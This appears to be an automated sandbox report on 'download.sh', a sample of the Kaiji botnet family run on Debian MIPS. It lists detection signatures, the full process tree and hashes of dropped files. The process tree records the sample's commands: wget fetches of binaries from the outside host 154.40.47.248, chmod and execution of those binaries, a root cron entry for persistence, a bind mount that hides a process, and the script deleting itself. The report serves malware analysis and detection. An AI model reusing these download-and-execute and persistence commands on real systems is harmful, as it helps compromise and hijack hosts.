Analysis

  • max time kernel
    149s
  • max time network
    147s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240418-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    16/04/2025, 18:46

General

  • Target

    download.sh

  • Size

    2KB

  • MD5

    544a2f391e2800bac07e883d902bcc75

  • SHA1

    cea67c26c372d03b795bbba678569256385d3b83

  • SHA256

    1dc484d51fb96c2097c2eb3695ff55d641e6778dbe8780cbbd0dbdfa688708ca

  • SHA512

    f281a43fb6443bf15069aee5987d06d493bc0f0f47b927aea17115db168e6bf3271e5f37a0dc7f76defd21b60c24e513fcda0c2f109ce26f5bd4b802de184a4b

Malware Config

Signatures

  • Kaiji 2 IoCs

    Kaiji payload

  • Kaiji family
  • File and Directory Permissions Modification 1 TTPs 2 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 4 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Changes its process name 1 IoCs
  • Command and Scripting Interpreter: Unix Shell 1 TTPs 2 IoCs

    Execute scripts via Unix Shell.

  • Enumerates kernel/hardware configuration 1 TTPs 33 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 8 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 2 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/download.sh
    /tmp/download.sh
    1⤵
    • Executes dropped EXE
    PID:716
    • /bin/uname
      uname -s
      2⤵
        PID:717
      • /bin/uname
        uname -m
        2⤵
          PID:719
        • /bin/rm
          rm -f linux_mips
          2⤵
          • System Network Configuration Discovery
          PID:720
        • /usr/bin/wget
          wget -t 1 http://154.40.47.248:8000/linux_mips
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:725
        • /bin/chmod
          chmod +x linux_mips
          2⤵
          • File and Directory Permissions Modification
          PID:761
        • /tmp/linux_mips
          ./linux_mips
          2⤵
          • System Network Configuration Discovery
          PID:762
        • /bin/rm
          rm -f linux_mips
          2⤵
          • System Network Configuration Discovery
          PID:765
        • /bin/rm
          rm -f linux_mipsel
          2⤵
          • System Network Configuration Discovery
          PID:767
        • /usr/bin/wget
          wget -t 1 http://154.40.47.248:8000/linux_mipsel
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:768
        • /bin/chmod
          chmod +x linux_mipsel
          2⤵
          • File and Directory Permissions Modification
          PID:798
        • /tmp/linux_mipsel
          ./linux_mipsel
          2⤵
          • Executes dropped EXE
          • Enumerates kernel/hardware configuration
          • System Network Configuration Discovery
          PID:799
          • /tmp/linux_mipsel
            ./linux_mipsel " "
            3⤵
            • Changes its process name
            • Enumerates kernel/hardware configuration
            • System Network Configuration Discovery
            PID:803
            • /bin/sh
              /bin/sh -c "/etc/32676&"
              4⤵
              • Executes dropped EXE
              • Command and Scripting Interpreter: Unix Shell
              PID:808
            • /usr/sbin/service
              service crond start
              4⤵
                PID:810
                • /usr/bin/basename
                  basename /usr/sbin/service
                  5⤵
                    PID:811
                  • /usr/bin/basename
                    basename /usr/sbin/service
                    5⤵
                      PID:813
                    • /bin/systemctl
                      systemctl --quiet is-active multi-user.target
                      5⤵
                      • Enumerates kernel/hardware configuration
                      • Reads runtime system information
                      PID:814
                    • /bin/systemctl
                      systemctl list-unit-files --full "--type=socket"
                      5⤵
                      • Enumerates kernel/hardware configuration
                      • Reads runtime system information
                      PID:816
                    • /bin/sed
                      sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
                      5⤵
                        PID:817
                      • /bin/systemctl
                        systemctl -p Triggers show dbus.socket
                        5⤵
                        • Enumerates kernel/hardware configuration
                        • Reads runtime system information
                        PID:818
                      • /bin/systemctl
                        systemctl -p Triggers show ssh.socket
                        5⤵
                        • Enumerates kernel/hardware configuration
                        • Reads runtime system information
                        PID:819
                      • /bin/systemctl
                        systemctl -p Triggers show syslog.socket
                        5⤵
                        • Enumerates kernel/hardware configuration
                        • Reads runtime system information
                        PID:820
                      • /bin/systemctl
                        systemctl -p Triggers show systemd-fsckd.socket
                        5⤵
                        • Enumerates kernel/hardware configuration
                        • Reads runtime system information
                        PID:821
                      • /bin/systemctl
                        systemctl -p Triggers show systemd-initctl.socket
                        5⤵
                        • Enumerates kernel/hardware configuration
                        • Reads runtime system information
                        PID:822
                      • /bin/systemctl
                        systemctl -p Triggers show systemd-journald-audit.socket
                        5⤵
                        • Enumerates kernel/hardware configuration
                        • Reads runtime system information
                        PID:823
                      • /bin/systemctl
                        systemctl -p Triggers show systemd-journald-dev-log.socket
                        5⤵
                        • Enumerates kernel/hardware configuration
                        • Reads runtime system information
                        PID:824
                      • /bin/systemctl
                        systemctl -p Triggers show systemd-journald.socket
                        5⤵
                        • Enumerates kernel/hardware configuration
                        • Reads runtime system information
                        PID:825
                      • /bin/systemctl
                        systemctl -p Triggers show systemd-networkd.socket
                        5⤵
                        • Enumerates kernel/hardware configuration
                        • Reads runtime system information
                        PID:826
                      • /bin/systemctl
                        systemctl -p Triggers show systemd-rfkill.socket
                        5⤵
                        • Enumerates kernel/hardware configuration
                        • Reads runtime system information
                        PID:827
                      • /bin/systemctl
                        systemctl -p Triggers show systemd-udevd-control.socket
                        5⤵
                        • Enumerates kernel/hardware configuration
                        • Reads runtime system information
                        PID:828
                      • /bin/systemctl
                        systemctl -p Triggers show systemd-udevd-kernel.socket
                        5⤵
                        • Enumerates kernel/hardware configuration
                        • Reads runtime system information
                        PID:830
                    • /usr/local/sbin/systemctl
                      systemctl start crond.service
                      4⤵
                        PID:810
                      • /usr/local/bin/systemctl
                        systemctl start crond.service
                        4⤵
                          PID:810
                        • /usr/sbin/systemctl
                          systemctl start crond.service
                          4⤵
                            PID:810
                          • /usr/bin/systemctl
                            systemctl start crond.service
                            4⤵
                              PID:810
                            • /sbin/systemctl
                              systemctl start crond.service
                              4⤵
                                PID:810
                              • /bin/systemctl
                                systemctl start crond.service
                                4⤵
                                • Enumerates kernel/hardware configuration
                                • Reads runtime system information
                                PID:810
                              • /bin/sh
                                /bin/sh -c "echo \"*/1 * * * * root /.mod \" >> /etc/crontab"
                                4⤵
                                • Creates/modifies Cron job
                                • Command and Scripting Interpreter: Unix Shell
                                PID:834
                              • /usr/bin/renice
                                renice -20 803
                                4⤵
                                  PID:839
                                • /bin/mount
                                  mount -o bind /tmp/ /proc/803
                                  4⤵
                                    PID:840
                                  • /usr/sbin/service
                                    service cron start
                                    4⤵
                                      PID:841
                                      • /usr/bin/basename
                                        basename /usr/sbin/service
                                        5⤵
                                          PID:843
                                        • /usr/bin/basename
                                          basename /usr/sbin/service
                                          5⤵
                                            PID:844
                                          • /bin/systemctl
                                            systemctl --quiet is-active multi-user.target
                                            5⤵
                                            • Enumerates kernel/hardware configuration
                                            • Reads runtime system information
                                            PID:846
                                          • /bin/systemctl
                                            systemctl list-unit-files --full "--type=socket"
                                            5⤵
                                            • Enumerates kernel/hardware configuration
                                            • Reads runtime system information
                                            PID:848
                                          • /bin/sed
                                            sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
                                            5⤵
                                              PID:849
                                            • /bin/systemctl
                                              systemctl -p Triggers show dbus.socket
                                              5⤵
                                              • Enumerates kernel/hardware configuration
                                              • Reads runtime system information
                                              PID:854
                                            • /bin/systemctl
                                              systemctl -p Triggers show ssh.socket
                                              5⤵
                                              • Enumerates kernel/hardware configuration
                                              • Reads runtime system information
                                              PID:855
                                            • /bin/systemctl
                                              systemctl -p Triggers show syslog.socket
                                              5⤵
                                              • Enumerates kernel/hardware configuration
                                              • Reads runtime system information
                                              PID:858
                                            • /bin/systemctl
                                              systemctl -p Triggers show systemd-fsckd.socket
                                              5⤵
                                              • Enumerates kernel/hardware configuration
                                              • Reads runtime system information
                                              PID:859
                                            • /bin/systemctl
                                              systemctl -p Triggers show systemd-initctl.socket
                                              5⤵
                                              • Enumerates kernel/hardware configuration
                                              • Reads runtime system information
                                              PID:862
                                            • /bin/systemctl
                                              systemctl -p Triggers show systemd-journald-audit.socket
                                              5⤵
                                              • Enumerates kernel/hardware configuration
                                              • Reads runtime system information
                                              PID:864
                                            • /bin/systemctl
                                              systemctl -p Triggers show systemd-journald-dev-log.socket
                                              5⤵
                                              • Enumerates kernel/hardware configuration
                                              • Reads runtime system information
                                              PID:866
                                            • /bin/systemctl
                                              systemctl -p Triggers show systemd-journald.socket
                                              5⤵
                                              • Enumerates kernel/hardware configuration
                                              • Reads runtime system information
                                              PID:869
                                            • /bin/systemctl
                                              systemctl -p Triggers show systemd-networkd.socket
                                              5⤵
                                              • Enumerates kernel/hardware configuration
                                              • Reads runtime system information
                                              PID:870
                                            • /bin/systemctl
                                              systemctl -p Triggers show systemd-rfkill.socket
                                              5⤵
                                              • Enumerates kernel/hardware configuration
                                              • Reads runtime system information
                                              PID:873
                                            • /bin/systemctl
                                              systemctl -p Triggers show systemd-udevd-control.socket
                                              5⤵
                                              • Enumerates kernel/hardware configuration
                                              • Reads runtime system information
                                              PID:875
                                            • /bin/systemctl
                                              systemctl -p Triggers show systemd-udevd-kernel.socket
                                              5⤵
                                              • Enumerates kernel/hardware configuration
                                              • Reads runtime system information
                                              PID:877
                                          • /usr/local/sbin/systemctl
                                            systemctl start cron.service
                                            4⤵
                                              PID:841
                                            • /usr/local/bin/systemctl
                                              systemctl start cron.service
                                              4⤵
                                                PID:841
                                              • /usr/sbin/systemctl
                                                systemctl start cron.service
                                                4⤵
                                                  PID:841
                                                • /usr/bin/systemctl
                                                  systemctl start cron.service
                                                  4⤵
                                                    PID:841
                                                  • /sbin/systemctl
                                                    systemctl start cron.service
                                                    4⤵
                                                      PID:841
                                                    • /bin/systemctl
                                                      systemctl start cron.service
                                                      4⤵
                                                      • Enumerates kernel/hardware configuration
                                                      • Reads runtime system information
                                                      PID:841
                                                    • /bin/systemctl
                                                      systemctl start crond.service
                                                      4⤵
                                                      • Enumerates kernel/hardware configuration
                                                      • Reads runtime system information
                                                      PID:880
                                                • /bin/rm
                                                  /bin/rm /tmp/download.sh
                                                  2⤵
                                                    PID:804
                                                • /etc/32676
                                                  /etc/32676
                                                  1⤵
                                                    PID:809
                                                    • /bin/sleep
                                                      sleep 60
                                                      2⤵
                                                        PID:812
                                                      • /bin/sleep
                                                        sleep 60
                                                        2⤵
                                                          PID:910
                                                        • /bin/sleep
                                                          sleep 60
                                                          2⤵
                                                            PID:921

                                                        Network

                                                        MITRE ATT&CK Enterprise v16

                                                        Replay Monitor

                                                        Loading Replay Monitor...

                                                        Downloads

                                                        • /.mod

                                                          Filesize

                                                          34B

                                                          MD5

                                                          f5a3713282e43c200f30342f5ff5e2ea

                                                          SHA1

                                                          2b2ce1a207e2b691a074c6f78f71c4785aae426a

                                                          SHA256

                                                          6ab64e727571458d4884fb2fe82c27c467db0699cb8f648b3f0217c35d2b7511

                                                          SHA512

                                                          5bcb8cd360409147a486755f90e0cdd97183af02ce8de5135b7c6a8a010deb9ef12dcd5ee9a2a8fd2e159347f68e72d6b7fd75e943b4fcd928d7a74b97476013

                                                        • /etc/.walk

                                                          Filesize

                                                          41B

                                                          MD5

                                                          b03c65123544e7d4af3d3db728b0c4d4

                                                          SHA1

                                                          e32b964efbce48c2817f38e97be344c23b4d48e7

                                                          SHA256

                                                          b29e13608838bdb20808aa6aaa14458f4a7484c9784575995d3bcac0e669f2ec

                                                          SHA512

                                                          8cbd864bc70ff26b2b1d0ebde6341daa6df7c6033ec0d1114a74f3fb891a079722e857434f36967d853a8297854d29bec1f16ad1386f6d5148f0a26f9b330861

                                                        • /etc/.walk

                                                          Filesize

                                                          90B

                                                          MD5

                                                          198407eedf6bfd37808428ab3300a90a

                                                          SHA1

                                                          9994b48255824c0d4890ecdb0d2aed2aebb23de3

                                                          SHA256

                                                          4a53e272e3438656c162ca067a2a82f95e90f1c308cad7e3bbb9e8fc054958d1

                                                          SHA512

                                                          ffd55d7901a0a9a1416c3999535393179836edc863818422fad3b9781f132d6bee6738221cbe109a87cd5f17d9574fe744fd58bde33bd36bf133a766ef516cb1

                                                        • /etc/32676

                                                          Filesize

                                                          56B

                                                          MD5

                                                          585f408444cbca746945f0cb63f2c3f0

                                                          SHA1

                                                          0e44bae17174f04514e770ca7fc4bec1007e39cd

                                                          SHA256

                                                          ebb961c647363dfa90f302de378e0e61807b9b792fc86616635a713cca8f4299

                                                          SHA512

                                                          022241dbafad55164701f67ef5b84154e3af97c5dfe77dee7bf8406f2befbd2962bbf4f243432b2f41d6c2376b87fcf551fd6945e03ddb02a5619c2f0f69c596

                                                        • /etc/profile.d/gateway.sh

                                                          Filesize

                                                          913B

                                                          MD5

                                                          1bc5e4de95c269b22485334c81253569

                                                          SHA1

                                                          8c421ecfdb8d090037226adc45f45de8c847f629

                                                          SHA256

                                                          2c6b57cdf813103c6e1db4e970c94378c2eaa362d94f3525afc3afb7249997b0

                                                          SHA512

                                                          d46c0af72a1663fa64f87f8ca891e2b5463b6219939125a0f2a89b9c13413733fa5171c5cf04dcaf346d88e468d44f0fc31af26e32b901dad5a4aa0462553416

                                                        • /tmp/linux_mips

                                                          Filesize

                                                          2.2MB

                                                          MD5

                                                          5ec2f6c412ccfcc16781a7f3f37fb474

                                                          SHA1

                                                          912cb18493577a0b5c64d994f4b6bc05990ae390

                                                          SHA256

                                                          e58dffab271cd20cb6089017017d8e6c5f68c56c2b1877e8a94bbcdadcd4ef4c

                                                          SHA512

                                                          ce37675e1ccfd0e7fdf2fe155473d94222ceb28cf8a3c797033617a07e7ce632240bdbb338d7c3aec5131a343d172a4d58a05e2558408e42b3eb80cf1767857f

                                                        • /tmp/linux_mipsel

                                                          Filesize

                                                          2.2MB

                                                          MD5

                                                          06a141032d508ea7639d82c044851727

                                                          SHA1

                                                          e49bf29f0c21f0e5a5d0ccee733ed1626df57d6b

                                                          SHA256

                                                          d3030e1575b48293f9364353127bd44892ec65120c11d1710eead510373aab55

                                                          SHA512

                                                          8173fc77c9ba84dc1a980c907dec6d2a37e20b3dec5438189fb1990e6c161de5a7ebc033091be2bcd7b80fb1bfe1478eb9f81f6811c9417fd95d3419c9cc2e05

                                                        • /usr/bin/include/find

                                                          Filesize

                                                          240KB

                                                          MD5

                                                          bb4edcad76062a76284c69f5fe4e50ea

                                                          SHA1

                                                          86055be4ce94fa3cffa9924e7b511e95df636606

                                                          SHA256

                                                          b7e25e128c130473f33c5135c78f591f35d7c4a7c5e1246c12eaa298db453474

                                                          SHA512

                                                          254acc62d2f83f5a4686adcf3fe6ad4697f392c288c5baa323830bb6f2466c303fd7bc9f237e98b2ca76bc3abb6b4c264e042be8c4291ae5cc21b2189d996521